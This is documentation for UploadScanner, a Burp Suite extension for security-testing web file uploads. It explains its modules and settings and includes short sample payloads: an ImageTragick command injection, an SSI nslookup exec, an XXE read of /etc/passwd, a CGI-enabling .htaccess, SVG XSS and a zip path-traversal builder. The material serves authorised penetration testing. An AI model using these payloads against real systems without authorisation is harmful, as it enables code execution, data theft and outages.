A Burp Suite Pro extension to do security tests for HTTP file uploads.
Table of Contents
Testing web applications is a standard task for every security analyst. Various automated and semi-automated security testing tools exist to simplify the task. HTTP-based file uploads are one specialised use case. However, most automated web application security scanners do not adapt their attacks when encountering file uploads and are therefore likely to miss vulnerabilities related to file upload functionality.
While a lot of techniques used for file upload testing are documented throughout the web, the code necessary to automate such attacks is often missing. In other cases, the techniques only apply to very specific use cases. One of the goals of this research was to generalise and automate these attacks. The attack techniques include generic attacks such as Cross-Site Scripting (XSS), XML External Entity (XXE) injection and PHP/JSP/ASP code injection, but the goal is to execute these attacks customised for the use case of HTTP-based file uploads. Additionally, more specific attacks on server-side parsers are used as an attack vector, for example Server Side Request Forgery (SSRF) through m3u8 playlist files being parsed with LibAv.
File uploads on websites are an underestimated area for security testing. A server that parses uploaded files automatically exposes a much larger attack surface. While some of the issues that might occur get very high attention (e.g. the ImageTragick vulnerability), there are countless memory corruption bugs fixed every day in various parsers that might also be in use on your webserver. And while your REST XML web service might not be vulnerable to XML External Entity (XXE) injection, that doesn't mean your image parser for JPEG XMP metadata (which is XML) has no XXE issue.
Various techniques are necessary to successfully upload a file, including correlation of file extensions, content types, and content. Moreover, the file content has to pass server-side checks or modifications such as image size requirements or resizing operations. Circumventing server-side processing, creating content that survives the modification, or creating content that results in the desired payload after the modification is another goal of this extension.
While there are already a couple of Burp extensions doing some checks, this extension tries to implement most attacks that seem feasible for file uploads. The extension tests various attacks and is divided into modules. Each module handles several attacks of the same category.
While the extension has various interesting features in its various modules, one of the main features is:
UploadScanner.py is the file you need to import into Burp; see PortSwigger's support page on how to install an extension.
After installing the extension, check the "Global & Active Scanning configuration" tab of the extension. If a field is marked red, there is an error.
There are several tutorial videos available for the different topics that will help you get started. The UI of the extension changed a little since the videos were made, but it should be possible to get the basic ideas:
What's missing is a how-to on using Burp's macro and session handling together with ReDownloader to get around aggressive XSRF tokens (some XSRF protections work out of the box with this extension).
This project was developed by Tobias "floyd" Ospelt, @floyd_ch, https://www.floyd.ch of modzero AG, @mod0, https://www.modzero.ch
However, we would like to acknowledge that this extension stands on the shoulders of giants. To develop this extension it was necessary to use techniques from all over the Internet. Very often the attacks in this extension simply copy work from other people. We try to acknowledge and reference their work here. If you are not included in the following list but we used parts of your work, please let us know or send a pull request to add yourself. This list is in no particular order:
Background information and FAQ for the UploadScanner extension.
To make sure we are talking about the same things, let's define some frequently used terms you will encounter in the UI and source code of this extension. This extension centers around the following requests and their responses, which are always sent in the following order:
The upload request includes the uploaded file content. Most upload requests also include a filename and content type specified by the user/browser. Sometimes websites also calculate the size of the file content in bytes and send it as another parameter. And sometimes all of that is missing and only the file content is uploaded. This extension can handle all these cases. When you do an upload of a specific file in the browser and send that request to the UploadScanner extension, that request and response pair is called the base request response (brr). The request part of the brr is either a multipart request (handled by the MultipartInjector class in the code) or it includes the file content somewhere in the body for example in a JSON parameter (handled by the FlexiInjector feature).
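To illustrate the difference (the endpoint, parameter names and encoding below are made-up examples, not something the extension requires), the same avatar upload could reach the server in either of these two shapes; the first would be handled by MultipartInjector, the second by FlexiInjector:

import base64
import requests

file_bytes = open("avatar.png", "rb").read()

# Shape 1: classic multipart/form-data upload (MultipartInjector case).
requests.post(
    "https://example.org/upload",
    files={"avatar": ("avatar.png", file_bytes, "image/png")},
)

# Shape 2: file content embedded (here base64-encoded) in a JSON body
# (FlexiInjector case); parameter names are hypothetical.
requests.post(
    "https://example.org/api/avatar",
    json={
        "filename": "avatar.png",
        "content_type": "image/png",
        "data": base64.b64encode(file_bytes).decode(),
    },
)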
The only goal of the preflight request is to make it possible to create a ReDownload request by parsing the preflight response. It can be used when the upload response does not indicate where the file was stored on the server, so you might need to go to a different URL first (the preflight request) to get the URL of the newly uploaded file.
The ReDownload response has to include the file content we uploaded.
For example:
Upload request: uploads avatar.png as my new profile picture
Preflight request: GET /profile
Preflight response: includes <img src="https://example.org/RaNdOmLyChangingFooBar/avatar.png">
ReDownload request: https://example.org/RaNdOmLyChangingFooBar/avatar.png as redownload request
ReDownload response: the avatar.png file content; an avatar.png that still contains our payload indicates a vulnerability
When we want to scan a file upload we need to ask the following questions:
The most likely scenario is that you made too many requests and were simply blocked. Or you filled up the server's disk with files. Another option is that an uploaded .htaccess file broke it because it conflicted with the global server settings. Or if you enabled the DoS module, you asked for it. This extension has broken certain SAP third-party modules in the past, you have been warned.
In most cases it is recommended to originally upload a file that is larger than 100 bytes through the proxy. This means the request you send to the extension as the base request should include a file that is at least 100 bytes. As this extension has settings that try to find the file size in requests (enabled by default), the extension will only do a global search/replace of this number in the request if it is at least 100 bytes. Globally replacing numbers lower than 100 seems too error prone, e.g. we don't want to replace the 23 in a %23 included in the request just because the original uploaded file coincidentally has a length of 23.
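As a minimal sketch of this heuristic (not the extension's actual code), the idea is simply:

def replace_file_size(request_bytes, old_size, new_size):
    # Globally replacing small numbers such as "23" would also hit
    # unrelated bytes like the "23" in "%23", so the replacement is
    # only attempted for original file sizes of at least 100 bytes.
    if old_size < 100:
        return request_bytes
    return request_bytes.replace(str(old_size).encode(), str(new_size).encode())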
File extensions are never varied in capitalization (e.g. .ExE or similar). I see little benefit in that, but source code modifications should be easy if you require this.
As with nearly every other active scan implemented in Burp (or any other scanner for that matter), the extension is not able to scan websites that require more than one upload request for the file to be stored on the server. However, you could use Burp macros to achieve this. In general, file uploads that require multiple requests or complex calculations (e.g. checksums over file content in upload requests) are out of scope for this extension. Feel free to let us know if you modified the source code to achieve this goal anyway.
As with nearly every other active scan implemented in Burp (or any other scanner for that matter), the extension is also not able to scan upload requests that are not repeatable (e.g. aggressive CSRF protections).
Although this extension also runs under Burp Suite Community Edition, it has to skip all tests which use the Burp Collaborator feature. Additionally, it can only print issue summaries to stdout as no issues can be added inside Burp Suite Community Edition. So all in all this extension is pretty much useless in Burp Suite Community Edition.
At the moment the BMP image format is not supported, as the image libraries used in the extension do not support it. TIFF files are currently never resized, but this might automatically start working when Burp and the extension are run with Java 1.9 or newer.
There are also a lot of TODOs in the code that are related to features that could be implemented.
In general web application security scanners have the following ways to detect issues:
All these detection mechanisms have pros and cons, and most of the time only some of them can be used at all.
One of the most important things is to download uploaded files again to see how they were processed. The ReDownloader feature can help with this, but it is only available when requests are sent to this extension via the context menu. As detecting issues is complicated and servers can throw errors in various ways on bad input files, it is recommended to additionally install the Error Message Checks extension and the ResponseClusterer extension to catch unusual responses. A few tests in some of the modules of this extension do not even have an associated issue check and rely solely on the above extensions. In the end, going manually through the responses in Logger++ will help to fully understand the mechanisms of the file upload. It will make the difference between running a tool blindly and doing a proper security test.
As a side note, please configure a private Burp Collaborator instance if you are doing a security analysis. Using the default PortSwigger instance is simply unprofessional.
Detecting successful uploads automatically is hard. After executing this module you will need to redownload all files that were uploaded with a filename starting with "Dwld". This allows modules to see if the upload/download was successful and add corresponding scan issues. To help you with this you can use the Burp Spider, any other Burp tool or the ReDownloader feature of this extension.
Modern browsers can send file uploads in various ways. The classic way is a multipart HTTP request; these are automatically detected and scanned during active scans with this extension. But what about customized JavaScript that uses the FileReader API to read the content and then sends customized HTTP messages? Some web developers base64 encode the content in those HTTP messages, and in general JSON is a very popular format. For this case this extension has a functionality called FlexiInjector. The only thing you need to do is tell the FlexiInjector which file you are going to upload in the browser and which mime type the browser will set (this extension also tries to auto-detect the mime type). The extension will afterwards autodetect the filename, content and content type in actively scanned requests, even when the content is base64/hex/url... encoded.
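A rough sketch of how an encoded upload can still be located in a request body (simplified; the real detection also covers hex, URL and other encodings):

import base64

def find_file_content(request_body, file_content):
    # Both arguments are bytes. Returns the encoding under which the
    # uploaded file content was found in the request body, or None.
    if file_content in request_body:
        return "plain"
    if base64.b64encode(file_content) in request_body:
        return "base64"
    return None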
A lot of modules upload images and can resize them before uploading, so if the web application requires an image to have a certain size, you can simply configure it here. Having said that, some modules of this extension do not support image resizing, as it either doesn't apply (what's the image size of an ImageTragick MVG?) or the images are hand-crafted and their payload and purpose would be destroyed by resizing. If it finds a suitable exiftool binary, this extension will use exiftool on the shell to plant PHP, JSP, XXE, SSI and other code in various image metadata locations (keywords, comment, iptc:keywords, xmp:keywords, exif:ImageDescription, ThumbnailImage). It currently supports injecting metadata into gif, png, jpeg, tiff, pdf and mp4 files. If you don't have exiftool installed and the shipped binaries do not work, the extension will simply not do these tests. The easiest way is to have a binary (or symlink) called "exiftool" in your $PATH. The other option is specifying an absolute path in the extension's UI if it is really not found (rare these days).
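For illustration, planting a payload into a single metadata field with exiftool could look roughly like this (the payload, tag and filename are examples only, not the extension's exact invocation):

import subprocess

payload = '<?php echo "uploadscanner-test"; ?>'  # example payload only

# Write the payload into the Keywords metadata tag of image.png;
# -overwrite_original avoids the *_original backup file exiftool creates.
subprocess.run(
    ["exiftool", "-overwrite_original", "-Keywords=" + payload, "image.png"],
    check=True,
)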
The ReDownloader allows files to be automatically downloaded again in most cases. When we send the upload request and the response either includes a URL indicating where to find the file or the URL is static, the extension can parse the URL from the response. You will need to specify a start marker and an end marker between which the URL is located in the response. If the markers are not found, no download of the file is attempted. If the markers are found, a request to the configured prefix plus parsed URL plus configured suffix is sent. The extension autodetects whether this resulting URL starts with http[s]:// or not, to make sure relative or absolute requests are sent accordingly. You can use ${FILENAME} in the prefix and suffix and other fields where indicated, to mark where the correctly encoded filename should be put. This feature is only available when requests are sent to the extension via the context menu. The UI will show you when you misconfigured certain parameters and when it's ready to test. This feature is especially helpful when the same file on the server is overwritten each time a file is uploaded (e.g. common for avatar image uploads).
Keep in mind that for every successful upload that has the marker in the response, another request is sent. Therefore, this feature will make the extension send a lot more requests. This feature is enabled as soon as you specify a start and an end marker. As an alternative to the parsing approach you can specify a static URL path where the file can be redownloaded. This will potentially generate even more requests than the marker approach.
If you specify markers for the response parsing approach, they will be used instead of the static URL (markers take precedence). Currently I would claim that this allows configuring an automatic download in most situations. Sometimes you have to configure Burp macros along with it, which can be quite complex.
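Conceptually, the marker-based parsing works like the following simplified sketch (the real feature additionally handles the ${FILENAME} placeholder, encoding and relative URLs):

def build_redownload_url(response_text, start_marker, end_marker, prefix="", suffix=""):
    # Take whatever sits between the two markers; if either marker is
    # missing, no ReDownload request is sent.
    start = response_text.find(start_marker)
    if start == -1:
        return None
    start += len(start_marker)
    end = response_text.find(end_marker, start)
    if end == -1:
        return None
    return prefix + response_text[start:end] + suffix

# Example: parsing a JSON upload response and prepending a CDN host
# build_redownload_url('{"FileLocation":"/foo/avatar.png"}',
#                      '"FileLocation":"', '"',
#                      prefix="https://cdn.example.org")
# -> "https://cdn.example.org/foo/avatar.png"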
Most of the features were incrementally added as they were needed when running the extension against bug bounty program websites. This was done to make sure the features allow scanning real-world web applications. As most bug bounty programs exclude automated scanners, the scans for each website took place over several days by configuring an appropriate request throttle in the settings and by changing the code to abort the scans if too many errors were returned. The extension was run against:
However, as new features were added to the UploadScanner in the meantime, it might even make sense to rescan the above bounty programs.
Moreover, the extension was run in Burp on macOS and Windows. See the Limitations section for things that did not work during the tests.
A very important rule is: don't configure things you don't need. The default values are the sane choices. While the UI looks huge, most parts do not need configuration unless you want to achieve a specific goal. The UI will also complain and mark things in red that are configured incorrectly.
Moreover, the global and active scan configuration tab will be used as the default configuration for any scans sent via context menu.
The UI that shows the requests additionally supports a small feature that allows randomizing a certain part of the upload request. If the marker ${RANDOMIZE}
(which has a length of 12 characters) is included in the upload request, this marker will be replaced by a random 12-digit number in each request that is sent by the extension. On a side note, the last dash-delimited group of a UUID is also 12 characters long, so this is a helpful feature if a server requires the client to send a random, unique UUID in requests.
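In essence (a simplified sketch, not the extension's exact code) the substitution looks like this:

import random

def apply_randomize_marker(request_bytes):
    # ${RANDOMIZE} is 12 characters long, so replacing it with a random
    # 12-digit number keeps the length of the request body unchanged.
    value = str(random.randint(10**11, 10**12 - 1)).encode()
    return request_bytes.replace(b"${RANDOMIZE}", value)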
By deactivating modules it is possible to make the extension send fewer files to a server. Additionally, the order in which the modules are executed might be important for you if you stop a scan and would like to restart it without having to run all the modules again. You can either check the output of the extension in the Extender tab to see what the extension is doing or check Logger++, as the filenames usually include a hint about which module is sending which request.
In the global configuration tab this defines whether requests should be created that upload images, PDFs, zip files and so on and pass them to Burp's Active Scan (and other extensions) as insertion points. The individual insertion points are the different metadata locations of the files. This means that Burp (and all other Burp extensions) can do their active scan checks on those uploads. Additionally, this feature will also detect if a user uploaded a CSV file and will provide the line with the most values as insertion points to Burp (each field individually) while trying to do escaping for quoted CSV formats. In the global configuration this option is enabled by default. Over time another injection provider was developed, putting all active scan payloads into JPEG and PNG images, so they might get picked up by server-side OCR implementations.
If you send a request manually to the UploadScanner via the context menu, this option will pass the request to the Burp Active Scanner. For context menu invocations this is disabled by default (as it is assumed that you might have already active scanned this request). If you checked this option in the global options, the scans described above will be done as well.
The imagetragick module uploads command injection payloads using the sleep (Unix) and ping (Windows) commands (CVE-2016-3714) and checks for a timeout (in-band). It has additional checks via Burp Collaborator interactions with wget, curl (Unix) and ping (Windows). These issues are tested with MVG and SVG files.
Additionally, it checks for SSRF (CVE-2016-3718) via Burp Collaborator URLs (out-of-band) using MVG files.
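For reference, the publicly documented ImageTragick PoCs use MVG content along the following lines (shown here with a sleep command; this is an illustration, not necessarily the exact payload the module sends):
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.org/image.jpg"|sleep "5)'
pop graphic-context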
Quoting from the manuals: "Precede the image file name with | to pipe to a system command". This module tries to execute nslookup payloads (or wget/curl/rundll32) to get Burp Collaborator DNS interactions. It sends the original file content from the base request.
The ghostscript module uploads files including command injections as described in CVE-2016-7976 and CVE-2017-8291, with nslookup payloads (or wget/curl/rundll32) to check for Burp Collaborator interactions. It also tries to include /etc/passwd in a file. The files are in the PostScript format starting with %!PS.
The LibAvFormat module uploads an m3u8 file that has an external reference, so it can check for SSRF via Burp Collaborator URLs (out-of-band). It also does the same with an m3u8 file embedded in an AVI file. The m3u8 data looks like this:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://example.org/example.mp4
##prevent cache: RANDOM
#EXT-X-ENDLIST
The PHP code module uploads images which include server-side PHP code, using filenames with single and double extensions (e.g. .php.png). It also uploads very simple files that only include PHP code. This could potentially trigger RCE as described on hackerone. It also tries phtml and php5 file extensions. It has one special case where it tries to inject code directly into the GIF image content (not metadata) as described on secgeek. Additionally, it has a partially implemented trick using PNG IDAT chunks as explained on idontplaydarts.
The JSP code module uploads images which include server-side JSP code, using filenames with single and double extensions (e.g. .jsp.png). It also uploads very simple files that only include JSP code. The attacks use the <% %> syntax and the ${} expression syntax as well as the JSPX XML syntax.
The ASP code module uploads images which include server-side ASP code, using filenames with single and double extensions (e.g. .asp.png). It also uploads very simple files that only include ASP code. The attacks use the <%= %> ASP syntax. It has one special case where it tries to inject code directly into the GIF image content (not metadata) as described on secgeek.
The htaccess module tries to upload .htaccess files, hoping that it will be interpreted by the server. The content of the htaccess will enable Server Side Includes (see also next module) and will also enable directory listings. This module is run before the SSI module to make sure it has a better chance to achieve code execution. The htaccess file content looks like this:
Options +Indexes +Includes +ExecCGI
AddHandler cgi-script .cgi .pl .py .rb
AddHandler server-parsed .shtml .stm .shtm .html .jpeg .png .mp4
AddOutputFilter INCLUDES .shtml .stm .shtm .html .jpeg .png .mp4
Additionally, this module will upload a web.config file that is similar to what htaccess files do, but for Windows IIS servers.
The CGI module uploads Perl, Python and Ruby files that might get executed if the server has configured CGI or if the htaccess module was able to enable it. In general this module is unlikely to succeed, as the uploaded files have to be executable (chmod +x).
Executes commands on the server with the <!--#exec cmd="nslookup test.example.org" -->
SSI syntax by uploading simple files including only such payloads. It tries to achieve this by executing nslookup (or wget/curl/rundll32) and finding the DNS response in the HTTP response. Another test tries to find Edge Side Includes (ESI) by using the esi:include syntax with a Burp Collaborator URL.
Uploads SVG files with xlink references to Burp Collaborator URLs. It also uploads an XML with an entity pointing to /etc/passwd. Furthermore, generic XXE XML techniques are applied to the SVG with Burp Collaborator URLs. The generic XXE XML techniques include a DTD specification in the DOCTYPE, an XML XSL stylesheet reference in an xml-stylesheet tag, a SYSTEM entity in the DOCTYPE and usage of that entity inside the DOCTYPE, a SYSTEM entity in the DOCTYPE and usage of that entity inside the XML itself, XInclude by using an xi:include tag, and injection into schema location specifications. The tag used to inject the payloads is a standard text tag.
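As an illustration of the SYSTEM-entity variant injected into an SVG text tag (a generic textbook example, not the module's exact payload):
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <text x="10" y="20">&xxe;</text>
</svg>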
The module also sends a script tag of type application/java-archive inside an SVG, using a Burp Collaborator URL in the xlink:href attribute. This idea was taken from a Metasploit module.
It then also uploads XML files, which have all the generic XXE XML techniques applied as explained above. The tag used to inject the payloads is a tag called tagtest, defined in the DOCTYPE.
The next step is to upload Microsoft Office documents (Excel and Word) in the modern format of zipped XMLs. The techniques explained above that inject into the DOCTYPE are applied to all XML files found in the default Office zip first. In further uploads they are applied only to the main content XML file (document.xml or workbook.xml). The techniques explained above that use tags are then applied to the core.xml file, which includes the dc:creator tag.
As a last step, various images in different image formats with XMP metadata are produced. The XMP metadata includes the XXE attacks discussed above with Burp Collaborator URLs.
This module first tries to upload a simple file with HTML content. It then tries to upload an SVG file with a script tag executing JavaScript. It also uploads a Flash swf file that could lead to XSS. Afterwards, for some image formats, the metadata trick is used again to include HTML in the metadata of image files.
The content type of the responses is checked, so that fewer false positives are flagged if the browser wouldn't execute the included JavaScript (e.g. if image/png is returned).
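The SVG case boils down to the well-known pattern below (illustrative payload):
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(document.domain)</script>
</svg>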
The eicar module uploads the EICAR antivirus test file and adds a scan issue if you download that file again. If it was uploaded and downloaded successfully, it means there is probably no antivirus installed on the server.
This module uploads a PDF file that includes JavaScript that could be executed in a PDF reader. An issue is added if the PDF can be downloaded again or if the server requests the included Burp Collaborator URL. The same checks are done for the BadPDF vulnerability. Various other PDFs that do similar checks are uploaded as well.
The other SSRF module will upload files that can be used to achieve other Server Side Request Forgeries that are not covered in other modules. Currently, this module only uploads .URL files, which might lead to SSRF SMB connections on Windows if opened.
This module uploads malicious CSV and spreadsheet (Microsoft Excel) files as described on the contextis blog. If the files can be downloaded again, an issue is added to Burp. Additionally, it will detect if an uploaded file was a CSV file. If that is the case, it detects the delimiter, looks for the line with the most values and provides each value as an insertion point to the Burp active scanner.
Uploads zip files that have path traversal payloads in the filenames of the zip file entries. A bit of a shot in the dark, as I haven't seen a zip implementation where unpacking results in path traversal vulnerabilities, but you never know. This could be helpful if a server unpacks zip files.
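A minimal sketch of how such a "zip slip" style archive can be built (file names and paths are illustrative only):

import zipfile

# The entry name contains a path traversal sequence, so a naive
# extractor would write the file outside the intended directory.
with zipfile.ZipFile("traversal.zip", "w") as zf:
    zf.writestr("../../../../tmp/uploadscanner_poc.txt", "proof of concept")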
The polyglot module uploads CSP-bypass JPEG/JavaScript polyglots and adds a scan issue if you download such a file again. See the Burp blog post for the JPEG/JavaScript polyglot and the thinkfu blog post for the GIF/JavaScript polyglot. Moreover, the module will upload corkami's corkamix PDF/Jar/HTML/JavaScript/PE polyglot because it simply rocks and because it can be used as a CSP bypass proof of concept as well. As it is also a JAR file, in the good old days of Java applets this might have caused additional trouble. In the end it also uploads a simple JavaScript/zip polyglot.
This module is only available when a request is sent to UploadScanner via context menu and when the ReDownloader feature is configured.
The fingerping tool is able to fingerprint image libraries that modify a set of uploaded PNG files. The original project is located on 0xcite's fingerprint page on GitHub and the fork used in this extension on floyd's fingerping page on GitHub.
Knowing the server-side image parser is important for a security test, for example to check for an old version or to go back, fuzz the parser and then exploit it on the server. The result of the fingerping run is given as a score out of 60, where the last line is the most likely match. This module also often triggers HTTP 500 or 400 error codes.
This module creates an informational finding if it is able to download enough images to fingerprint.
It would be very nice to get some more fingerprints of image libraries for this module, that's why the finding will also include a fingerprint you could submit if you know the exact version of the image library used on the server.
Sends special filenames with the original file content to the server. These special filenames include Unicode left-to-right overwrite characters, semicolons, RFC 2047 encoding and null truncated names. It adds a scan issue if you download one of those files again.
Additionally, filenames with a very long name, all bytes between 0x01 and 0x1f, all bytes between 0x20 and 0x2f, or UTF-16 with Byte Order Marks (BOM) are uploaded. Some additional filenames include forbidden filenames on Windows (COM1), the single dot (.), the asterisk (*) and filenames with Windows CLSIDs (test.{D20EA4E1-3957-11d2-A40B-0C5020524153}).
Changes all http and https URLs detected in the originally uploaded file content of the base request to Burp Collaborator payloads. However, this module is not file-format aware and might therefore produce invalid files.
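Conceptually this is nothing more than a blind search and replace, roughly like this sketch (the collaborator URL is a placeholder):

import re

def replace_urls(file_content, collaborator_url):
    # Both arguments are bytes. Every http(s) URL is rewritten to the
    # Burp Collaborator URL; since the file format is ignored, the
    # result may no longer be a valid file.
    pattern = rb"""https?://[^\s"'<>]+"""
    return re.sub(pattern, collaborator_url, file_content)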
Disabled by default. This module features its own UI elements once it is enabled. It reads all files in a user-supplied directory (and its subdirectories) and uploads them (filename, content, content type) to the server, trying to guess the mime type correctly. This module can be used to upload your own collection, for example files from offline fuzzing runs, or a collection that can be found on the web, such as:
This module's functionality is similar to the Burp Intruder File Upload Generator extension, but it tries to guess the correct content type to include in the HTTP request and automates the entire approach a little further.
Disabled by default. This module features its own UI elements once it is enabled. It does random bit or byte mutations on the originally uploaded file from the base request or injects well-known fuzzing strings. Good luck! This might get really useful as soon as you test servers that have weird parsing libraries for exotic file formats, webservers on embedded devices and so on. Or for the bored pentester who wants to see if the website struggles with corrupt files.
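The byte-level mutation idea is roughly the following sketch (simplified; the module also injects known fuzzing strings):

import random

def flip_random_bits(file_content, flips=5):
    # Flip a handful of random bits in a copy of the original upload.
    data = bytearray(file_content)
    for _ in range(flips):
        pos = random.randrange(len(data))
        data[pos] ^= 1 << random.randrange(8)
    return bytes(data)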
Disabled by default. Attention, this module is dangerous. Samples can lead to memory exhaustion, high disk usage and/or segmentation faults and other crashes. This has brought down big websites before. During tests the scanner thread in Burp was simply stuck for more than a minute; in other cases, when scanning the same server with multiple threads, the entire scan check stayed stuck forever. You have been warned. It mainly uploads files that are known to crash image parsers such as ImageMagick, GraphicsMagick or the Python Image Library (PIL). These are partially "0days", aka "I just fuzzed them with AFL" crashes. It also uses silly things such as fork bombs as ImageTragick payloads.
Modules only send file formats that are enabled in these UI settings. This is another possibility to make the extension send fewer files to a server. Each of the file formats should be self-explanatory.
These are general options that can be modified for each UploadScanner scan.
The extension saves all settings. When checking this checkbox, it will delete all project-specific settings of the UploadScanner extension on the next reload. This includes DownloadMatchers, the extension-internal scope definition, all Burp collaborator instances and the requests sent via context menu. The extension can be reloaded in the Extender tab of the Burp UI. However, it will keep the extension-specific settings, which are all those configured in the "Global & Active Scanning configuration" tab.
This UI option is only shown when the extension couldn't find exiftool on your system and couldn't use one of the shipped binaries.
This extension executes exiftool on the command line and comes with two exiftool binaries (plain Perl and a Windows exe). It will try to use your installation of exiftool first, but make sure your exiftool binary is called just "exiftool" (not "exiftool-5.24") and is in your $PATH.
You can specify the name of the exiftool binary in your $PATH or you can specify an absolute path in this UI option. This field will be marked in red if the exiftool binary could not be found.
Burp's global options for active scan throttling are not applied to extensions up to Burp version 1.7.32, so this parameter allows configuring such a throttle for those older versions. Also, if you start the scan from the UploadScanner context menu, the scan is not categorized as an active scan, so this setting still allows you to throttle those requests.
When using sleep based payloads where we expect the server to delay the delivery of the response during a successful attack, this sleep time is used. As websites usually have different response times, this value might be too high or too low for the tested website.
Enable this option if you want to log all requests done by the extension in the "Done uploads" tab. You can also just use the Logger++ extension instead. This log is never persisted and is cleared when the UploadScanner extension is reloaded.
Some websites include the filename as an additional multipart parameter (e.g. Slack). So the filename is not only specified in the multipart parameter called "filename", but there is a separate multipart part that includes only the filename. These file uploads therefore send the name in two parameters of the request. Other websites might include it in another JSON or URL parameter. By default, the extension will do an additional search/replace of the original filename in the base request.
See last option. Sometimes the content type is specified in multiple locations in requests.
See the last option. Some websites (e.g. the github avatar picture upload) include the size of the uploaded file in bytes in another multipart part of the request. It is recommended to make sure that the original file in the base request is over 100 bytes, otherwise this feature is ignored; see the "Limitations" section.
Usually when you configure Burp Collaborator with a DNS name, the extension will send Remote Command Execution (RCE) payloads such as nslookup payload.private.collaborator.example.org. As nslookup works on Windows and Unix, this way of identifying DNS interactions should work fine for most cases and is the default. However, when you configure Burp Collaborator with an IP address, the payloads will be something like 192.168.0.15/payload and obviously DNS interactions cannot be detected. Therefore this extension will automatically switch to using curl, wget and rundll32 payloads when it detects that the Burp Collaborator is IP based. Sometimes it is inevitable to use an IP-based Burp Collaborator, for example if you are in a test environment without DNS and without Internet access.
This option allows to enable curl, wget and rundll32 instead of nslookup when you use a DNS based Burp Collaborator. This might make sense if you think the server is not allowed to do nslookups, but maybe it is allowed to connect to the outside world via a proxy. In that case you might get lucky and curl, wget or the browser opened with rundll32 have a proxy configured.
This setting, or an IP-based Burp Collaborator, makes the extension send three times as many files for RCE payloads.
So if you want the most thorough scan you can get and you have a DNS based Burp Collaborator, you have to run the entire extension twice, once with and once without this option.
FlexiInjector allows detecting file uploads, even if no HTTP multipart request is used.
To detect files in non-multipart forms, specify the file that is included in the base request.
You need to specify the mime type of the file specified in the previous option. It's important that it is the same mime type as the one specified in the base request.
As this extension generates a lot of images, it will use the specified width and height to generate images where possible. As an additional feature the extension will also color the files differently, so if you render the files they have a uniform random color. However, as modules will reuse the same file content, the colors do not change in every request.
These options are only shown when requests are sent to the UploadScanner manually. The ReDownloader feature is never used for active scans.
In most of these options you can use the placeholder ${FILENAME}
, which will be replaced with the filename that was uploaded.
The UI of the UploadScanner will show a preview of the request as soon as you configure it correctly.
The most important thing is that you press the button "Send ReDownload request" once you've configured this feature. The button "Start scan without ReDownloader" will change to "Start scan with ReDownloader" as soon as you configured everything correctly.
If you need to send a preflight request to find out where a file was stored, you can specify an absolute or relative URL here.
The leading 1. and 2. indicate the two alternative ways to configure the ReDownloader. Do not configure both. If you can, prefer the first version with the start and end marker.
Let's say the upload response includes the following JSON:
{"status":"success", "FileLocation":"https:\/\/cdn.example.org\/RaNdOmLyChangingFooBar\/avatar.png"}
Then your start marker for parsing would be:
"FileLocation":"
To achieve maximum flexibility (e.g. because with literal values in this UI field you cannot express a newline), the extension also supports another mechanism. To use this mechanism you have to start your input with ${PYTHONSTR:
followed by a Python string and end the input with }
.
The Python string has to be parseable by Python's ast.literal_eval, and literal_eval has to return a string for your input. So the equivalent of the start marker for the above example would be:
${PYTHONSTR:'"FileLocation":"'}
Let's say we need a start marker for a more complicated response:
status: success
https://cdn.example.org/RaNdOmLyChangingFooBar/avatar.png
size: 1MB
You would be able to use a start marker such as:
${PYTHONSTR:"success\n"}
Make sure you use the right newline type. It's also possible to use \x41 hex encoding in these strings.
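Conceptually, the marker fields are interpreted roughly like this (a simplified sketch of the mechanism described above):

import ast

def parse_marker(ui_value):
    # If the field starts with ${PYTHONSTR: and ends with }, the part in
    # between is evaluated as a Python string literal, which makes it
    # possible to express newlines ("\n") or hex escapes ("\x41").
    if ui_value.startswith("${PYTHONSTR:") and ui_value.endswith("}"):
        value = ast.literal_eval(ui_value[len("${PYTHONSTR:"):-1])
        if not isinstance(value, str):
            raise ValueError("PYTHONSTR input must evaluate to a string")
        return value
    return ui_value

# parse_marker('${PYTHONSTR:"success\\n"}') -> 'success\n'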
Let's say the upload response includes the following JSON:
{"status":"success", "FileLocation":"https:\/\/cdn.example.org\/RaNdOmLyChangingFooBar\/avatar.png"}
Then your end marker for parsing would be:
"}
This UI field also supports the ${PYTHONSTR:'"}'}
syntax explained for the start marker.
Let's assume you configured the previous two options to parse the following URL from the JSON upload response:
{"status":"success", "FileLocation":"https:\/\/cdn.example.org\/RaNdOmLyChangingFooBar\/avatar.png"}
As the URL is escaping slashes, you will need to enable this option. This kind of encoding is very common.
Let's say you sent the upload request to the server www.example.org
and the upload response includes the following JSON:
{"status":"success", "FileLocation":"/RaNdOmLyChangingFooBar/avatar.png"}
However, you know that this URL is relative and that the avatar is not located on www.example.org
(default assumption of this extension), but on cdn.example.org
. In this case you can specify the start marker and end marker for the parsers and then configure this URL prefix as:
https://cdn.example.org
So after receiving the upload response, the extension knows that prefix plus parsed part is the file location:
https://cdn.example.org/RaNdOmLyChangingFooBar/avatar.png
See last option. This can be used for example if you would like to add something after the parsed part. For example the following upload response is correctly parsed:
{"status":"success", "FileLocation":"https://cdn.example.org/RaNdOmLyChangingFooBar/avatar.png"}
But you know that the CDN will require the URL parameter token=UserSessionSecretToken, so you can specify it in this field:
?token=UserSessionSecretToken
So after receiving the upload response, the extension knows that parsed part plus suffix is the file location:
https://cdn.example.org/RaNdOmLyChangingFooBar/avatar.png?token=UserSessionSecretToken
Instead of configuring a parser that parses the upload response or the preflight response, you can also configure only this option. If you have a static URL where the file will end up, you can configure it here, for example:
https://www.example.org/uploads/${FILENAME}
These UI settings are only shown once the corresponding module was activated in the modules section. The module allows specifying which folder's content should be uploaded and whether the filename, file extension or mime type from the base request should be kept. Additionally, it allows applying the generic URL replacer module to these files as well.
These UI settings are only shown once the fuzzer module was activated in the modules section. Both options allow configuring how many fuzzing requests should be sent.